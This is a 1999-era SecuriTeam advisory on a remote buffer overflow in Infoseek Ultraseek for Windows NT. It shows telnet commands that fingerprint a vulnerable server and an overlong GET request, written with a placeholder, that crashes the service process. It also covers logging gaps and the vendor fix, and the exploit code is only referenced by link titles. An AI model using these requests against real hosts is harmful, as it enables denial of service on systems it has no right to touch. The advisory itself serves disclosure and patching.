SecuriTeam - Infoseek's Ultraseek for Windows NT is vulnerable to a remote buffer overflow

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

CanSecWest 2012

2nd Annual Cyber Security

Hack In Paris

By default the Ultraseek search engine listens on port 8765 and provides an HTTP interface to allow internet/intranet users to search a server for documents pertaining to their search keywords. This HTTP interface contains a security vulnerability that allows remote attackers to compromise the remote system.

Credit:
The information has been provided by: USSR & eEye.

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

Vulnerable systems:
Infoseek Ultraseek 3.1 and prior for Windows NT

To identify a vulnerable server you should do the following:
C:\>telnet www.example.com 8765
HEAD / HTTP/1.0

HTTP/1.0 200 OK
Server: Ultraseek/3.1 Python/1.5.1
Date: Thu, XX Dec 1999 23:59:42 GMT
Content-type: text/html
Content-length: 0

The overflow occurs in the HTTP Get command. To DoS (perform a Denial of Service attack against) the server you should do the following:
C:\>telnet www.example.com 8765
GET /[overflow]/ HTTP/1.0
<enter>
<enter>

At this point one of the two pyseekd.exe (Ultraseek Server Process) will drop and reinitialize. Since it is a service you will never get an error message on the screen - you won't even notice the process drops and reloads unless you look closely, when the DoS occurs, that one of the two pyseekd.exe processes will now have a new PID.

Note: The example will just create a file called ussreeye.txt in whatever the current root is. This exploit has only been tested against Ultraseek 2.1 for NT Service Pack 5 and NT Service Pack 6.

Exploit for Ultraseek2.1, With Sp5
Exploit for Ultraseek2.1, With Sp6
Exploit Source for Ultraseek2.1, With Sp5
Exploit Source for Ultraseek2.1, With Sp6

What gets logged?
In the application event log you will see a Warning with the following information: "Ultraseek Server: Warning: restarted 3.1.4". In the Ultraseek http access logs (C:\Program Files\Infoseek\UltraseekServer\data\logs ) nothing is logged.

This is another example of a web service fails to log a command before it processes (this also happens with IIS). Any service that takes commands needs to log the command first and then process it - that way unless there is an overflow in the logging process we will always know what IP performed the attack.

Fix:
http://software.infoseek.com/products/ultraseek/upgrade_nt.htm
ftp://ftp.infoseek.com/pub/software/ultraseek-3.1.5.exe

blog comments powered by Disqus

	Microsoft Windows shmedia.dll Division By Zero, Explore.exe DOS Exploit
	IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS
	Progea Movicon TCPUploadServer Remote Exploit
	Trango Broadband Wireless Rogue SU Authentication Bug
	Exposing HMS HICP Protocol and Intellicom NetBiterConfig.exe Remote Buffer Overflow
	Family Connections Multiple Remote Vulnerabilities
	VideoCache vccleaner Root Vulnerability
	QuickHeal Antivirus 2010 Local Privilege Escalation
	DubSite CMS Cross Site Request Forgery Vulnerability
	SonicWall Global Management System XSS Vulnerability
	Sonicwall NSA E7500 XSS Vulnerability
	Juniper Security Threat Response Manager XSS Vulnerability
	Hacking CSRF Tokens using CSS History Hack
	Sun Java System Identiy Manager Users Enumeration
	Microsoft Internet Explorer XML Buffer Overflow (Exploit)